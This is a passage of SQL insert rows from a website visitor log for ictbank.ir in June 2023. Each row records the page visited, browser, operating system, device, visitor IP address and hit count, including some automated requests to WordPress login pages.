(34207,'2023-06-13','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.194','000',0,1,0),
(34208,'2023-06-13','https://ictbank.ir/omidi/','Samsung Internet','Android','21.0','mobile:smart','Galaxy A12','','5.117.78.24','000',0,2,0),
(34209,'2023-06-13','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(34210,'2023-06-13','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.26','000',0,2,0),
(34211,'2023-06-13','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(34212,'2023-06-13','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.53','000',0,4,0),
(34213,'2023-06-13','https://ictbank.ir/blog','Opera','Windows','8.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(34214,'2023-06-13','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','142.202.48.16','000',0,1,0),
(34215,'2023-06-13','https://www.google.com/','Chrome','Android','113.0.0.0','mobile:smart','Unknown','','72.14.201.43','000',0,2,0),
(34216,'2023-06-13','https://www.google.com/','Chrome','Android','113.0.0.0','mobile:smart','Unknown','','193.186.4.42','000',0,1,0),
(34217,'2023-06-13','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.44','000',0,2,0),
(34218,'2023-06-13','https://www.google.com/','Chrome','Android','113.0.0.0','mobile:smart','Unknown','','72.14.201.42','000',0,1,0),
(34219,'2023-06-13','https://ICTBANK.IR/BLOG/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','202.66.172.235','000',0,1,0),
(34220,'2023-06-13','http://ictbank.ir','Safari','OS X','13.0.0','desktop','Macintosh','','185.129.61.8','000',0,1,0),
(34221,'2023-06-13','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','159.89.235.72','000',0,1,0),
(34222,'2023-06-13','https://ictbank.ir/hooman/admin/','Chrome','Windows','114.0.0.0','desktop','Unknown','','5.238.39.132','000',0,57,0),
(34223,'2023-06-13','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.103','000',0,4,0),
(34224,'2023-06-13','https://ictbank.ir/blog','Edge','Windows','91.0.0.0','desktop','Unknown','','178.254.29.124','000',0,1,0),
(34225,'2023-06-13','https://45.92.94.221:443/blog','Chrome','Windows','110.0.0.0','desktop','Unknown','','44.192.49.232','000',0,12,0),
(34226,'2023-06-13','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.219.48.42','000',0,1,0),
(34227,'2023-06-13','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.11','000',0,4,0),
(34228,'2023-06-13','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','81.88.52.214','000',0,1,0),
(34229,'2023-06-13','https://ictbank.ir/blog','Chrome','Windows','102.0.0.0','desktop','Unknown','','37.139.53.179','000',0,2,0),
(34230,'2023-06-13','https://ictbank.ir/golrang_payment/major_buyers/sw.js','Unknown','Android','Unknown','mobile:smart','Galaxy S21 FE','','5.127.53.63','000',0,1,0),
(34231,'2023-06-13','https://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(34232,'2023-06-13','https://ictbank.ir/blog','Chrome','Windows','85.0.0.0','desktop','Unknown','','120.203.71.177','000',0,12,0),
(34233,'2023-06-14','https://ictbank.ir/blog','Chrome','Windows','110.0.0.0','desktop','Unknown','','199.127.56.236','000',0,1,0),
(34234,'2023-06-14','https://ictbank.ir/blog','Firefox','Linux','52.0','desktop','Unknown','','51.120.120.16','000',0,1,0),
(34235,'2023-06-14','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.31','000',0,4,0),
(34236,'2023-06-14','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.148','000',0,1,0),
(34237,'2023-06-14','http://ictbank.ir/blog/connection-encryption-in-oracle-database/','Chrome','Windows','103.0.0.0','desktop','Unknown','','45.133.193.164','000',0,2,0),
(34238,'2023-06-14','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','194.169.175.36','000',0,1,0),
(34239,'2023-06-14','https://ictbank.ir/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.70','000',0,1,0),
(34240,'2023-06-14','https://ictbank.ir/blog','Chrome','Windows','99.0.0.0','desktop','Unknown','','64.227.158.178','000',0,1,0),
(34241,'2023-06-14','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.53','000',0,4,0),
(34242,'2023-06-14','https://www.google.com/','Edge','OS X','113.0.0.0','desktop','Macintosh','','113.185.51.201','000',0,1,0),
(34243,'2023-06-14','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(34244,'2023-06-14','https://ictbank.ir/blog','Chrome','Windows','99.0.0.0','desktop','Unknown','','64.227.129.203','000',0,1,0),
(34245,'2023-06-14','https://ictbank.ir/blog','Chrome','Linux','12.0.0.0','desktop','Unknown','','208.80.194.126','000',0,3,0),
(34246,'2023-06-14','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.103','000',0,4,0),
(34247,'2023-06-14','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.140.5','000',0,3,0),
(34248,'2023-06-14','https://ictbank.ir/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','101.37.161.3','000',0,1,0),
(34249,'2023-06-14','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.46','000',0,2,0),
(34250,'2023-06-14','https://ictbank.ir/blog','Chrome','Windows','70.0.0.0','desktop','Unknown','','139.59.57.148','000',0,1,0),
(34251,'2023-06-14','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.18','000',0,2,0),
(34252,'2023-06-14','https://mail.design-arena.ir/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','1.192.195.8','000',0,1,0),
(34253,'2023-06-14','https://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(34254,'2023-06-14','https://ictbank.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','1.192.192.4','000',0,1,0),
(34255,'2023-06-14','https://ictbank.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','1.192.192.8','000',0,1,0),
(34256,'2023-06-14','https://ictbank.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','1.192.195.5','000',0,1,0),
(34257,'2023-06-14','https://ictbank.ir/blog','Yandex Browser','Android','23.0.0.0.0','mobile:smart','Reno 5 Lite','','93.159.230.88','000',0,1,0),
(34258,'2023-06-14','https://ictbank.ir/blog','Chrome','Windows','100.0.0.0','desktop','Unknown','','93.158.91.239','000',0,2,0),
(34259,'2023-06-14','https://ictbank.ir/blog','Chrome','Windows','100.0.0.0','desktop','Unknown','','93.158.91.244','000',0,1,0),
(34260,'2023-06-14','https://ictbank.ir/blog','Chrome','Windows','100.0.0.0','desktop','Unknown','','93.158.91.247','000',0,1,0),
(34261,'2023-06-14','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','185.104.44.99','000',0,1,0),
(34262,'2023-06-14','https://45.92.94.221/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.26','000',0,1,0),
(34263,'2023-06-14','https://45.92.94.221/blog/','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.229','000',0,1,0),
(34264,'2023-06-14','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.134.27.231','000',0,1,0),
(34265,'2023-06-14','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.202.1.183','000',0,1,0),
(34266,'2023-06-14','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,1,0),
(34267,'2023-06-14','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','194.169.175.35','000',0,1,0),
(34268,'2023-06-14','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.36','000',0,2,0),
(34269,'2023-06-14','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','83.230.14.30','000',0,1,0),
(34270,'2023-06-14','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(34271,'2023-06-14','https://duckduckgo.com/','Edge','Windows','114.0.0.0','desktop','Unknown','','45.84.85.151','000',0,1,0),
(34272,'2023-06-14','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','202.21.38.89','000',0,2,0),
(34273,'2023-06-14','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','146.59.69.71','000',0,1,0),
(34274,'2023-06-14','https://ictbank.ir/blog','Chrome','Windows','83.0.0.0','desktop','Unknown','','138.68.248.59','000',0,3,0),
(34275,'2023-06-14','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','45.156.128.7','000',0,2,0),
(34276,'2023-06-14','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.163.226.138','000',0,1,0),
(34277,'2023-06-14','https://ictbank.ir/blog','Chrome','Windows','38.0.0.0','desktop','Unknown','','46.161.14.104','000',0,4,0),
(34278,'2023-06-14','https://ictbank.ir/blog','Firefox','Fedora','95.0','desktop','Unknown','','135.181.78.177','000',0,1,0),
(34279,'2023-06-14','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','188.166.94.189','000',0,1,0),
(34280,'2023-06-14','https://ictbank.ir/blog','Firefox','Fedora','95.0','desktop','Unknown','','184.171.250.244','000',0,1,0),
(34281,'2023-06-14','https://ictbank.ir/blog','Chrome','Windows','85.0.0.0','desktop','Unknown','','43.134.186.231','000',0,9,0),
(34282,'2023-06-14','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.7','000',0,2,0),
(34283,'2023-06-14','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','120.26.63.215','000',0,1,0),
(34284,'2023-06-14','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','67.205.172.101','000',0,1,0),
(34285,'2023-06-14','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','159.89.235.72','000',0,1,0),
(34286,'2023-06-14','https://www.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.146','000',0,2,0),
(34287,'2023-06-14','http://ictbank.ir','Firefox','Windows','113.','desktop','Unknown','','192.42.116.203','000',0,1,0),
(34288,'2023-06-14','http://www.ictbank.ir','Firefox','Windows','113.','desktop','Unknown','','23.155.24.7','000',0,1,0),
(34289,'2023-06-14','https://ictbank.ir/blog','Firefox','Windows','113.','desktop','Unknown','','162.247.74.206','000',0,1,0),
(34290,'2023-06-14','https://ictbank.ir/blog/feed','Firefox','Windows','113.','desktop','Unknown','','154.16.116.61','000',0,2,0),
(34291,'2023-06-14','https://ictbank.ir/blog/about-me','Firefox','Windows','113.','desktop','Unknown','','185.220.101.22','000',0,2,0),
(34292,'2023-06-14','http://ictbank.ir/blog/categories','Firefox','Windows','113.','desktop','Unknown','','45.154.98.65','000',0,5,0),
(34293,'2023-06-14','https://ictbank.ir/blog/comments/feed','Firefox','Windows','113.','desktop','Unknown','','185.7.33.146','000',0,2,0),
(34294,'2023-06-14','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.54','000',0,2,0),
(34295,'2023-06-15','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','132.145.39.16','000',0,7,0),
(34296,'2023-06-15','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.133.179.124','000',0,1,0),
(34297,'2023-06-15','https://ictbank.ir/blog','Chrome','Windows','10.0.0.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(34298,'2023-06-15','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.31','000',0,4,0),
(34299,'2023-06-15','https://ictbank.ir/blog','Chrome','Windows','54.0.0.0','desktop','Unknown','','3.84.245.235','000',0,2,0),
(34300,'2023-06-15','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','194.169.175.37','000',0,2,0),
(34301,'2023-06-15','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.103','000',0,2,0),
(34302,'2023-06-15','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.36','000',0,4,0),
(34303,'2023-06-15','https://ictbank.ir/blog','Firefox','Windows','31.0','desktop','Unknown','','42.51.225.98','000',0,1,0),
(34304,'2023-06-15','https://www.google.com/','Chrome','Linux','114.0.0.0','desktop','Unknown','','45.176.206.227','000',0,2,0),
(34305,'2023-06-15','https://ictbank.ir/blog','Chrome','Windows','83.0.0.0','desktop','Unknown','','137.184.136.24','000',0,2,0),
(34306,'2023-06-15','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.48','000',0,3,0),
(34307,'2023-06-15','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','202.21.38.89','000',0,6,0),
(34308,'2023-06-15','https://ictbank.ir/blog','Firefox','Windows','66.0','desktop','Unknown','','193.201.8.40','000',0,2,0),
(34309,'2023-06-15','https://ictbank.ir/blog','Chrome','Windows','83.0.0.0','desktop','Unknown','','143.244.147.206','000',0,2,0),
(34310,'2023-06-15','https://ictbank.ir/blog','Firefox','Windows','4.0.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(34311,'2023-06-15','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.219.56.243','000',0,1,0),
(34312,'2023-06-15','https://ictbank.ir/blog','Chrome','OS X','39.0.0.0','desktop','Macintosh','','194.169.175.92','000',0,1,0),
(34313,'2023-06-15','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.87.137.237','000',0,2,0),
(34314,'2023-06-15','https://ictbank.ir/blog','Chrome','Linux','113.0.0.0','desktop','Unknown','','44.236.207.248','000',0,4,0),
(34315,'2023-06-15','https://ictbank.ir/blog','Chrome','Linux','114.0.0.0','desktop','Unknown','','54.189.230.128','000',0,4,0),
(34316,'2023-06-15','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','104.168.253.82','000',0,1,0),
(34317,'2023-06-15','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(34318,'2023-06-15','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','114.0.0.0','desktop','Unknown','','5.238.37.45','000',0,43,0),
(34319,'2023-06-15','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.141','000',0,2,0),
(34320,'2023-06-15','https://ictbank.ir/omidi/','Samsung Internet','Android','21.0','mobile:smart','Galaxy A12','','5.115.154.69','000',0,3,0),
(34321,'2023-06-15','https://ictbank.ir/hooman/admin/index.php?pid=teachers&teacher_id=4&func=payments','Chrome','Windows','114.0.0.0','desktop','Unknown','','5.237.182.112','000',0,1,0),
(34322,'2023-06-15','https://ictbank.ir/blog','Opera','OS X','89.0.0.0','desktop','Macintosh','','38.154.4.31','000',0,3,0),
(34323,'2023-06-15','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','192.3.232.23','000',0,2,0),
(34324,'2023-06-15','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','192.185.2.232','000',0,1,0),
(34325,'2023-06-15','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','45.156.128.12','000',0,1,0),
(34326,'2023-06-15','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.7','000',0,1,0),
(34327,'2023-06-15','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.198.71.239','000',0,1,0),
(34328,'2023-06-15','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.44','000',0,2,0),
(34329,'2023-06-15','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(34330,'2023-06-15','https://ictbank.ir/blog','Edge','Windows','.0','desktop','Unknown','','5.188.87.37','000',0,1,0),
(34331,'2023-06-15','https://ictbank.ir/blog','Firefox','Fedora','95.0','desktop','Unknown','','103.152.164.103','000',0,1,0),
(34332,'2023-06-15','https://www.design-arena.ir/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','180.163.220.47','000',0,1,0),
(34333,'2023-06-15','https://www.design-arena.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','180.163.220.42','000',0,1,0),
(34334,'2023-06-15','https://www.design-arena.ir/blog/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','180.163.220.97','000',0,2,0),
(34335,'2023-06-15','https://www.design-arena.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','180.163.220.43','000',0,1,0),
(34336,'2023-06-15','https://www.design-arena.ir/blog/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','180.163.220.52','000',0,1,0),
(34337,'2023-06-15','https://www.design-arena.ir/blog/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','180.163.220.60','000',0,2,0),
(34338,'2023-06-15','https://ictbank.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','180.163.220.125','000',0,1,0),
(34339,'2023-06-15','https://ictbank.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','180.163.220.51','000',0,1,0),
(34340,'2023-06-15','https://45.92.94.221:443/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.7','000',0,2,0),
(34341,'2023-06-16','https://ictbank.ir/blog','Firefox','Fedora','95.0','desktop','Unknown','','43.143.88.244','000',0,1,0),
(34342,'2023-06-16','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.36','000',0,4,0),
(34343,'2023-06-16','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.54','000',0,6,0),
(34344,'2023-06-16','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Galaxy S8 Active','','43.156.217.173','000',0,1,0),
(34345,'2023-06-16','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.6','000',0,2,0),
(34346,'2023-06-16','https://ictbank.ir/blog','Firefox','Windows','107.0','desktop','Unknown','','138.128.244.84','000',0,1,0),
(34347,'2023-06-16','https://ictbank.ir/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','51.75.247.54','000',0,2,0),
(34348,'2023-06-16','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','62.210.207.206','000',0,1,0),
(34349,'2023-06-16','https://design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','193.118.55.162','000',0,2,0),
(34350,'2023-06-16','https://ICTBANK.IR/BLOG/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','210.245.90.242','000',0,1,0),
(34351,'2023-06-16','https://ictbank.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','101.198.0.181','000',0,1,0),
(34352,'2023-06-16','https://ictbank.ir/blog','Chrome','Linux','98.0.0.0','desktop','Unknown','','94.102.49.193','000',0,2,0),
(34353,'2023-06-16','https://ictbank.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','101.198.0.189','000',0,1,0),
(34354,'2023-06-16','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','194.169.175.36','000',0,1,0),
(34355,'2023-06-16','https://www.ictbank.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','101.198.0.187','000',0,1,0),
(34356,'2023-06-16','https://www.ictbank.ir/blog/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','101.198.0.156','000',0,1,0),
(34357,'2023-06-16','https://www.ictbank.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','101.198.0.151','000',0,1,0),
(34358,'2023-06-16','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.53','000',0,2,0),
(34359,'2023-06-16','https://ictbank.ir/blog','Chrome','Windows','98.0.0.0','desktop','Unknown','','179.43.142.31','000',0,1,0),
(34360,'2023-06-16','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.46','000',0,6,0),
(34361,'2023-06-16','https://ictbank.ir/blog','Opera','Windows','8.0','desktop','Unknown','','208.80.194.122','000',0,3,0),
(34362,'2023-06-16','https://ictbank.ir/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','153.92.16.50','000',0,2,0),
(34363,'2023-06-16','https://ictbank.ir/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','139.59.71.236','000',0,2,0),
(34364,'2023-06-16','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','198.54.119.81','000',0,2,0),
(34365,'2023-06-16','https://ICTBANK.IR/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','187.1.138.11','000',0,1,0),
(34366,'2023-06-16','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','209.203.48.58','000',0,2,0),
(34367,'2023-06-16','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','62.210.185.4','000',0,2,0),
(34368,'2023-06-16','https://ICTBANK.IR/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','167.71.144.52','000',0,1,0),
(34369,'2023-06-16','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','159.65.186.108','000',0,2,0),
(34370,'2023-06-16','https://ictbank.ir/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','173.249.41.202','000',0,1,0),
(34371,'2023-06-16','https://ICTBANK.IR/BLOG/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','31.172.80.137','000',0,2,0),
(34372,'2023-06-16','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','168.235.111.121','000',0,2,0),
(34373,'2023-06-16','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','93.188.2.5','000',0,1,0),
(34374,'2023-06-16','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.134.170','000',0,2,0),
(34375,'2023-06-16','https://45.92.94.221/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','107.150.126.151','000',0,9,0),
(34376,'2023-06-16','https://ictbank.ir/blog','Firefox','Windows','65.0','desktop','Unknown','','50.31.21.7','000',0,2,0),
(34377,'2023-06-16','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','202.21.38.89','000',0,2,0),
(34378,'2023-06-16','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','178.79.161.217','000',0,1,0),
(34379,'2023-06-16','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,2,0),
(34380,'2023-06-16','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','124.156.226.69','000',0,1,0),
(34381,'2023-06-16','https://ictbank.ir/blog','Chrome','Windows','114.0.0.0','desktop','Unknown','','41.75.171.249','000',0,1,0),
(34382,'2023-06-16','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,8,0),
(34383,'2023-06-16','https://45.92.94.221:443/blog','Chrome','OS X','92.0.0.0','desktop','Macintosh','','170.64.137.23','000',0,12,0),
(34384,'2023-06-16','https://45.92.94.221:443/blog','Chrome','OS X','92.0.0.0','desktop','Macintosh','','143.198.141.212','000',0,4,0),
(34385,'2023-06-16','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.11','000',0,4,0),
(34386,'2023-06-16','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','85.159.208.51','000',0,2,0),
(34387,'2023-06-16','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.194','000',0,5,0),
(34388,'2023-06-16','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.136','000',0,1,0),
(34389,'2023-06-16','http://ictbank.ir/blog/connection-encryption-in-oracle-database/','Vivaldi','Windows','5.0.0.0','desktop','Unknown','','172.86.122.201','000',0,2,0),
(34390,'2023-06-16','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','50.112.43.144','000',0,1,0),
(34391,'2023-06-16','https://ictbank.ir/blog','Firefox','Ubuntu','58.0','desktop','Unknown','','79.137.65.46','000',0,1,0),
(34392,'2023-06-16','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','104.168.201.83','000',0,2,0),
(34393,'2023-06-16','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','194.169.175.34','000',0,1,0),
(34394,'2023-06-16','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','45.156.128.2','000',0,2,0),
(34395,'2023-06-16','https://ictbank.ir/blog','Unknown','iOS','Unknown','mobile:smart','','','93.110.156.207','000',0,5,0),
(34396,'2023-06-16','https://ictbank.ir/dashtpodcast/wp-content/uploads/2020/04/Morteza-Ahmadi-Del-Bede.mp3','Safari','iOS','16.0','mobile:smart','iPhone','','93.110.156.207','000',0,1,0),
(34397,'2023-06-16','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','45.156.129.7','000',0,1,0),
(34398,'2023-06-16','https://ns1.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.75','000',0,2,0),
(34399,'2023-06-16','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','109.169.10.5','000',0,3,0),
(34400,'2023-06-16','https://search.brave.com/','Chrome','OS X','114.0.0.0','desktop','Macintosh','','84.124.186.15','000',0,5,0),
(34401,'2023-06-16','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','23.251.102.74','000',0,2,0),
(34402,'2023-06-16','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Mate 30 Pro','','47.254.25.10','000',0,1,0),
(34403,'2023-06-16','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Mate 30 Pro','','47.89.195.210','000',0,1,0),
(34404,'2023-06-16','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Mate 30 Pro','','47.88.94.28','000',0,1,0),
(34405,'2023-06-16','http://ictbank.ir/blog/connection-encryption-in-oracle-database/','Yandex Browser','Windows','22.0.0','desktop','Unknown','','103.157.139.7','000',0,2,0),
(34406,'2023-06-16','http://ictbank.ir','Chrome','Windows','80.0.0.0','desktop','Unknown','','76.66.161.86','000',0,1,0),
(34407,'2023-06-16','https://ictbank.ir/blog','Firefox','Linux','104.0','desktop','Unknown','','51.159.214.49','000',0,1,0),
(34408,'2023-06-16','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.103','000',0,2,0),
(34409,'2023-06-16','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','194.169.175.37','000',0,1,0),
(34410,'2023-06-17','https://ictbank.ir/blog','Chrome','Windows','83.0.0.0','desktop','Unknown','','165.22.178.154','000',0,2,0),
(34411,'2023-06-17','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,16,0),
(34412,'2023-06-17','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.60','000',0,2,0),
(34413,'2023-06-17','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','184.73.48.197','000',0,1,0),
(34414,'2023-06-17','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','202.21.38.89','000',0,2,0),
(34415,'2023-06-17','https://ictbank.ir/blog','Chrome','Linux','98.0.0.0','desktop','Unknown','','185.142.236.41','000',0,2,0),
(34416,'2023-06-17','https://ictbank.ir/blog','Chrome','OS X','91.0.0.0','desktop','Macintosh','','18.191.11.96','000',0,4,0),
(34417,'2023-06-17','https://ictbank.ir/blog','Chrome','Windows','83.0.0.0','desktop','Unknown','','104.239.90.85','000',0,1,0),
(34418,'2023-06-17','https://ictbank.ir/blog','Chrome','Windows','83.0.0.0','desktop','Unknown','','64.137.62.181','000',0,1,0),
(34419,'2023-06-17','http://ictbank.ir/blog/','Chrome','Windows','83.0.0.0','desktop','Unknown','','154.92.116.212','000',0,1,0),
(34420,'2023-06-17','http://ictbank.ir/blog/categories','Chrome','Windows','83.0.0.0','desktop','Unknown','','104.239.20.103','000',0,1,0),
(34421,'2023-06-17','http://ictbank.ir/blog/category/database/','Chrome','Windows','83.0.0.0','desktop','Unknown','','104.238.7.76','000',0,1,0),
(34422,'2023-06-17','http://ictbank.ir/blog/category/os/','Chrome','Windows','83.0.0.0','desktop','Unknown','','38.170.169.184','000',0,1,0),
